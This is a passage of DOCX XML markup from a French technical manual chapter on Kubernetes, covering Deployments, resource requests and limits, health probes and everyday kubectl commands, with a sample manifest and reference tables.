                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3883"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Namespace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Cloisonnement logique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un déploiement complet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apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t>kind: Deployment</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t xml:space="preserve">  labels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    app: api</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  replicas: 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    matchLabels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      app: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">  strategy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    type: RollingUpdate</w:t>
        <w:br/>
        <w:t xml:space="preserve">    rollingUpdate:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      maxSurge: 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">      maxUnavailable: 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">  template:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      labels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        app: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">    spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">          image: registry.exemple.fr/equipe/app:1.4.2</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            - containerPort: 3000</w:t>
        <w:br/>
        <w:t xml:space="preserve">          envFrom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            - configMapRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                name: api-config</w:t>
        <w:br/>
        <w:t xml:space="preserve">          resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              cpu: 100m</w:t>
        <w:br/>
        <w:t xml:space="preserve">              memory: 128Mi</w:t>
        <w:br/>
        <w:t xml:space="preserve">            limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              cpu: 500m</w:t>
        <w:br/>
        <w:t xml:space="preserve">              memory: 256Mi</w:t>
        <w:br/>
        <w:t xml:space="preserve">          readinessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            httpGet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              path: /ready</w:t>
        <w:br/>
        <w:t xml:space="preserve">              port: 3000</w:t>
        <w:br/>
        <w:t xml:space="preserve">            periodSeconds: 5</w:t>
        <w:br/>
        <w:t xml:space="preserve">          livenessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            httpGet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">              path: /health</w:t>
        <w:br/>
        <w:t xml:space="preserve">              port: 3000</w:t>
        <w:br/>
        <w:t xml:space="preserve">            initialDelaySeconds: 10</w:t>
        <w:br/>
        <w:t xml:space="preserve">            periodSeconds: 20</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NE CRÉEZ PAS DE PODS SEULS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Pod</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> créé directement n'est pas surveillé : s'il meurt, rien ne le recrée. Utilisez un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Deployment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, qui gère un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ReplicaSet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, qui gère les pods. Les pods directs servent au diagnostic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>66.3 Requêtes et limites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les ressources se déclarent en deux valeurs : la requête détermine le placement, la limite provoque un étranglement ou un arrêt. Les confondre produit des clusters instables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.240 — Quatre champs et leurs effets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91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Champ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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 sur le placement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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 à l'exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>requests.cpu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réservation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Garantie minimale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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limits.cpu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Aucun</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Étranglement (throttling)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>requests.memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réservation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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limits.memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Aucun</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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OOMKilled</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> si dépassement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications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Vérifier la consommation réelle</w:t>
        <w:br/>
        <w:t>kubectl top pods -n production</w:t>
        <w:br/>
        <w:t>kubectl describe pod -n production -l app=api | grep -A3 "Limits"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Un pod tué pour mémoire</w:t>
        <w:br/>
        <w:t>kubectl get pod -n production -l app=api \</w:t>
        <w:br/>
        <w:t>-o jsonpath='{range .items[*]}{.metadata.name}{"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "}{.status.containerStatuses[*].lastState.terminated.reason}{"\n"}{end}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une requête trop élevée rend un pod impossible à placer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Une limite trop basse provoque des redémarrages en boucle. Les valeurs se mesurent, elles ne se devinent pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>66.4 Sondes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois sondes répondent à trois questions différentes. Les confondre est l'une des erreurs les plus coûteuses en production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.241 — Trois sondes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5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Sonde</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Conséquence d'un échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2519"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>livenessProbe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le processus est-il vivant ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Redémarrage du conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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readinessProbe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Peut-il recevoir du trafic ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Retiré du service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2519"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>startupProbe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le démarrage est-il terminé ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Désactive les autres</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois sondes bien réglées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Startup : laisser le temps à une application lente</w:t>
        <w:br/>
        <w:t>startupProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  httpGet: { path: /health, port: 3000 }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  failureThreshold: 30</w:t>
        <w:br/>
        <w:t xml:space="preserve">  periodSeconds: 2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Readiness : dépendances secondaires incluses</w:t>
        <w:br/>
        <w:t>readinessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  httpGet: { path: /ready, port: 3000 }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  periodSeconds: 5</w:t>
        <w:br/>
        <w:br/>
        <w:t># Liveness : le processus seul, jamais les dépendances</w:t>
        <w:br/>
        <w:t>livenessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  httpGet: { path: /health, port: 3000 }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  periodSeconds: 20</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UNE LIVENESS QUI TESTE LA BASE REDÉMARRE TOUT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Si la liveness interroge la base de données, une panne de base provoque le redémarrage de tous les pods applicatifs. La liveness teste le processus ; la readiness teste la capacité à servir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>66.5 Appliquer et observer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kubectl apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> envoie un manifeste, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kubectl diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> montre l'écart, et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kubectl rollout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suit le déploiement. Ces trois commandes forment le socle du travail quotidien.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Huit commandes de base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kubectl apply -f deployment.yaml</w:t>
        <w:br/>
        <w:t>kubectl diff -f deployment.yaml</w:t>
        <w:br/>
        <w:t>kubectl get pods -n production -w</w:t>
        <w:br/>
        <w:t>kubectl describe pod api-7d9f8c6b5-x2k4m -n production</w:t>
        <w:br/>
        <w:t>kubectl logs -n production -l app=api --tail=50</w:t>
        <w:br/>
        <w:t>kubectl rollout status deployment/api -n production</w:t>
        <w:br/>
        <w:t>kubectl rollout history deployment/api -n production</w:t>
        <w:br/>
        <w:t>kubectl rollout undo deployment/api -n production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
